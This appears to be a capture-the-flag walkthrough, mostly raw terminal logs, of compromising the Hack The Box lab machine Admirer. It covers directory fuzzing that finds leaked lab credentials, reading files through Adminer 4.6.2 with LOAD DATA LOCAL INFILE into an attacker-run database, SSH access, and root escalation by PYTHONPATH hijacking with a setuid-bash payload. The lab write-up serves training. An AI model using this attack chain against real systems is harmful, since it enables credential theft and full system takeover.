



┌──(root㉿kali)-[/home/kali]
└─# wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -u http://10.10.10.187/admin-dir/FUZZ --hc 404
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.187/admin-dir/FUZZ
Total requests: 37050

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                             
=====================================================================

000000018:   200        29 L     39 W       350 Ch      "contacts.txt"                                      
000000016:   200        11 L     13 W       136 Ch      "credentials.txt"   


##########
# admins #
##########
# Penny
Email: p.wise@admirer.htb


##############
# developers #
##############
# Rajesh
Email: r.nayyar@admirer.htb

# Amy
Email: a.bialik@admirer.htb

# Leonard
Email: l.galecki@admirer.htb



#############
# designers #
#############
# Howard
Email: h.helberg@admirer.htb

# Bernadette
Email: b.rauch@admirer.htb



[Internal mail account]
w.cooper@admirer.htb
fgJr6q#S\W:$P

[FTP account]
ftpuser
%n?4Wz}R$tTF7

[Wordpress account]
admin
w0rdpr3ss01!




┌──(root㉿kali)-[/home/kali]
└─# ftp 10.10.10.187                   
Connected to 10.10.10.187.
220 (vsFTPd 3.0.3)
Name (10.10.10.187:kali): ftpuser
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||60526|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0            3405 Dec 02  2019 dump.sql
-rw-r--r--    1 0        0         5270987 Dec 03  2019 html.tar.gz
226 Directory send OK.
ftp> 

dump.sql contains nothing helpful

┌──(root㉿kali)-[/home/kali]
└─# mkdir html         
                                                                                                                     
┌──(root㉿kali)-[/home/kali]
└─# tar xvf html.tar.gz --directory html/
assets/
assets/sass/
assets/sass/base/
assets/sass/base/_reset.scss
assets/sass/base/_typography.scss
assets/sass/base/_page.scss
assets/sass/main.scss
assets/sass/noscript.scss
assets/sass/layout/
assets/sass/layout/_main.scss
assets/sass/layout/_footer.scss
assets/sass/layout/_header.scss
assets/sass/layout/_wrapper.scss
assets/sass/components/
assets/sass/components/_actions.scss
assets/sass/components/_form.scss
assets/sass/components/_icon.scss
assets/sass/components/_list.scss
assets/sass/components/_poptrox-popup.scss
assets/sass/components/_button.scss
assets/sass/components/_icons.scss
assets/sass/components/_table.scss
assets/sass/components/_panel.scss
assets/sass/libs/
assets/sass/libs/_functions.scss
assets/sass/libs/_vendor.scss
assets/sass/libs/_mixins.scss
assets/sass/libs/_breakpoints.scss
assets/sass/libs/_vars.scss
assets/js/
assets/js/browser.min.js
assets/js/util.js
assets/js/breakpoints.min.js
assets/js/main.js
assets/js/jquery.min.js
assets/js/jquery.poptrox.min.js
assets/css/
assets/css/main.css
assets/css/images/
assets/css/images/close.svg
assets/css/images/arrow.svg
assets/css/images/spinner.svg
assets/css/noscript.css
assets/css/fontawesome-all.min.css
assets/webfonts/
assets/webfonts/fa-brands-400.svg
assets/webfonts/fa-solid-900.eot
assets/webfonts/fa-brands-400.eot
assets/webfonts/fa-brands-400.ttf
assets/webfonts/fa-regular-400.woff
assets/webfonts/fa-regular-400.woff2
assets/webfonts/fa-regular-400.ttf
assets/webfonts/fa-regular-400.eot
assets/webfonts/fa-solid-900.svg
assets/webfonts/fa-brands-400.woff
assets/webfonts/fa-solid-900.woff
assets/webfonts/fa-solid-900.woff2
assets/webfonts/fa-brands-400.woff2
assets/webfonts/fa-regular-400.svg
assets/webfonts/fa-solid-900.ttf
images/
images/thumbs/
images/thumbs/thmb_arch02.jpg
images/thumbs/thmb_mind01.jpg
images/thumbs/thmb_nat02.jpg
images/thumbs/thmb_art02.jpg
images/thumbs/thmb_mus01.jpg
images/thumbs/thmb_nat01.jpg
images/thumbs/thmb_mus02.jpg
images/thumbs/thmb_eng02.jpg
images/thumbs/thmb_art01.jpg
images/thumbs/thmb_mind02.jpg
images/thumbs/thmb_eng01.jpg
images/thumbs/thmb_arch01.jpg
images/fulls/
images/fulls/mind02.jpg
images/fulls/mus01.jpg
images/fulls/eng01.jpg
images/fulls/art02.jpg
images/fulls/mus02.jpg
images/fulls/nat01.jpg
images/fulls/arch01.jpg
images/fulls/mind01.jpg
images/fulls/arch02.jpg
images/fulls/art01.jpg
images/fulls/nat02.jpg
images/fulls/eng02.jpg
index.php
robots.txt
utility-scripts/
utility-scripts/phptest.php
utility-scripts/info.php
utility-scripts/db_admin.php
utility-scripts/admin_tasks.php
w4ld0s_s3cr3t_d1r/
w4ld0s_s3cr3t_d1r/credentials.txt
w4ld0s_s3cr3t_d1r/contacts.txt
                                                                                                                     
┌──(root㉿kali)-[/home/kali/html]
└─# grep -ir password              
...
utility-scripts/db_admin.php:  $password = "Wh3r3_1s_w4ld0?";
utility-scripts/db_admin.php:  $conn = new mysqli($servername, $username, $password);
index.php:                        $password = "]F7jLHw:*G>UPrTo}~A"d6b";
index.php:                        $conn = new mysqli($servername, $username, $password, $dbname);
                                                                                                  

these creds do not work anymore, but this file will become useful again later.


we find that utility-scripts is on the web server, and we fuzz further.

┌──(root㉿kali)-[/home/kali/html]
└─# wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/quickhits.txt -u http://10.10.10.187/utility-scripts/FUZZ --hc 404
...                                     
000000669:   200        51 L     235 W      4157 Ch     "adminer.php"                                       
000001480:   403        9 L      28 W       277 Ch      "index.phps"                                        
000001485:   200        964 L    4976 W     84022 Ch    "info.php"                                          

Total time: 7.073895
Processed Requests: 2565
Filtered Requests: 2535
Requests/sec.: 362.6007



Adminer 4.6.2

https://sansec.io/research/adminer-4.6.2-file-disclosure-vulnerability



we want to create a database the server can connect to

┌──(root㉿kali)-[/home/kali]
└─# systemctl start mariadb         
                                
┌──(root㉿kali)-[/home/kali]
└─# mysql -u root -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 31
Server version: 11.8.3-MariaDB-1+b1 from Debian -- Please help get to 10k stars at https://github.com/MariaDB/Server

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> ALTER USER 'root'@'localhost' identified by '123456' ;
Query OK, 0 rows affected (0.002 sec)

MariaDB [(none)]> create database backup; use backup; create table backup (name  VARCHAR(2000));
Query OK, 1 row affected (0.000 sec)

Database changed
Query OK, 0 rows affected (0.008 sec)

MariaDB [backup]> create user 'backup'@'10.10.10.187' identified by '123456';
Query OK, 0 rows affected (0.003 sec)

MariaDB [backup]> grant all privileges on backup.* to 'backup'@'10.10.10.187';
Query OK, 0 rows affected (0.005 sec)

MariaDB [backup]> exit
Bye
                                  

we edit our /etc/mysql/mariadb.conf.d/50-server.cnf bind-address to our tun0
systemctl restart mariadb



in adminer

load data local infile '../index.php'
into table backup.backup
fields terminated by "\n"


in adminer we can now read the current creds

 edit	                        $servername = "localhost";
 edit	                        $username = "waldo";
 edit	                        $password = "&<h5b~yK3F#{PaPB&dA}{H>";
 edit	                        $dbname = "admirerdb";




┌──(root㉿kali)-[/home/kali]
└─# ssh waldo@10.10.10.187   
...
waldo@admirer:~$ 


waldo@admirer:/home$ sudo -l
[sudo] password for waldo: 
Matching Defaults entries for waldo on admirer:
    env_reset, env_file=/etc/sudoenv, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, listpw=always

User waldo may run the following commands on admirer:
    (ALL) SETENV: /opt/scripts/admin_tasks.sh
waldo@admirer:/home$ 


waldo@admirer:/home$ cat /opt/scripts/admin_tasks.sh 
#!/bin/bash

view_uptime()
{
    /usr/bin/uptime -p
}

view_users()
{
    /usr/bin/w
}

view_crontab()
{
    /usr/bin/crontab -l
}

backup_passwd()
{
    if [ "$EUID" -eq 0 ]
    then
        echo "Backing up /etc/passwd to /var/backups/passwd.bak..."
        /bin/cp /etc/passwd /var/backups/passwd.bak
        /bin/chown root:root /var/backups/passwd.bak
        /bin/chmod 600 /var/backups/passwd.bak
        echo "Done."
    else
        echo "Insufficient privileges to perform the selected operation."
    fi
}

backup_shadow()
{
    if [ "$EUID" -eq 0 ]
    then
        echo "Backing up /etc/shadow to /var/backups/shadow.bak..."
        /bin/cp /etc/shadow /var/backups/shadow.bak
        /bin/chown root:shadow /var/backups/shadow.bak
        /bin/chmod 600 /var/backups/shadow.bak
        echo "Done."
    else
        echo "Insufficient privileges to perform the selected operation."
    fi
}

backup_web()
{
    if [ "$EUID" -eq 0 ]
    then
        echo "Running backup script in the background, it might take a while..."
        /opt/scripts/backup.py &
    else
        echo "Insufficient privileges to perform the selected operation."
    fi
}

backup_db()
{
    if [ "$EUID" -eq 0 ]
    then
        echo "Running mysqldump in the background, it may take a while..."
        #/usr/bin/mysqldump -u root admirerdb > /srv/ftp/dump.sql &
        /usr/bin/mysqldump -u root admirerdb > /var/backups/dump.sql &
    else
        echo "Insufficient privileges to perform the selected operation."
    fi
}



# Non-interactive way, to be used by the web interface
if [ $# -eq 1 ]
then
    option=$1
    case $option in
        1) view_uptime ;;
        2) view_users ;;
        3) view_crontab ;;
        4) backup_passwd ;;
        5) backup_shadow ;;
        6) backup_web ;;
        7) backup_db ;;

        *) echo "Unknown option." >&2
    esac

    exit 0
fi


# Interactive way, to be called from the command line
options=("View system uptime"
         "View logged in users"
         "View crontab"
         "Backup passwd file"
         "Backup shadow file"
         "Backup web data"
         "Backup DB"
         "Quit")

echo
echo "[[[ System Administration Menu ]]]"
PS3="Choose an option: "
COLUMNS=11
select opt in "${options[@]}"; do
    case $REPLY in
        1) view_uptime ; break ;;
        2) view_users ; break ;;
        3) view_crontab ; break ;;
        4) backup_passwd ; break ;;
        5) backup_shadow ; break ;;
        6) backup_web ; break ;;
        7) backup_db ; break ;;
        8) echo "Bye!" ; break ;;

        *) echo "Unknown option." >&2
    esac
done

exit 0
waldo@admirer:/home$ 


SETENV !

we also see mention of a backup.py that we can read, owned by root

waldo@admirer:/home$ cat /opt/scripts/backup.py
#!/usr/bin/python3

from shutil import make_archive

src = '/var/www/html/'

# old ftp directory, not used anymore
#dst = '/srv/ftp/html'

dst = '/var/backups/html'

make_archive(dst, 'gztar', src)
waldo@admirer:/home$ ls -lsa /opt/scripts/backup.py
4 -rwxr----- 1 root admins 198 Dec  2  2019 /opt/scripts/backup.py
waldo@admirer:/home$ id
uid=1000(waldo) gid=1000(waldo) groups=1000(waldo),1001(admins)
waldo@admirer:/home$ 




we first attempt to put a file or symlink in /var/www/html/ , then trigger the backup.
but we do not have write access

waldo@admirer:/home$ echo 'import os;os.system("chmod u+s /bin/bash")' > /var/www/html/shell.py
-bash: /var/www/html/shell.py: Permission denied
waldo@admirer:/home$ find /var/www/html/ -type d -writable 2>/dev/null
waldo@admirer:/home$ find /var/www/html/ -type d -perm -g=w 2>/dev/null
waldo@admirer:/home$ 



so instead we hijack the PYTHONPATH

waldo@admirer:/tmp$ mkdir pyhijack
waldo@admirer:/tmp$ echo 'import os;os.system("chmod u+s /bin/bash")' > /tmp/pyhijack/shutil.py
waldo@admirer:/tmp$ sudo PYTHONPATH=/tmp/pyhijack /opt/scripts/admin_tasks.sh 6
Running backup script in the background, it might take a while...
waldo@admirer:/tmp$ Traceback (most recent call last):
  File "/opt/scripts/backup.py", line 3, in <module>
    from shutil import make_archive
ImportError: cannot import name 'make_archive'
id
uid=1000(waldo) gid=1000(waldo) groups=1000(waldo),1001(admins)
waldo@admirer:/tmp$ bash -p
bash-4.4# id
uid=1000(waldo) gid=1000(waldo) euid=0(root) groups=1000(waldo),1001(admins)


if needed to switch to real uid/gid

bash-4.4# python3 -c 'import os; os.setuid(0); os.setgid(0); os.system("/bin/bash -i")'
root@admirer:/tmp# id
uid=0(root) gid=0(root) groups=0(root),1000(waldo),1001(admins)
root@admirer:/tmp# 







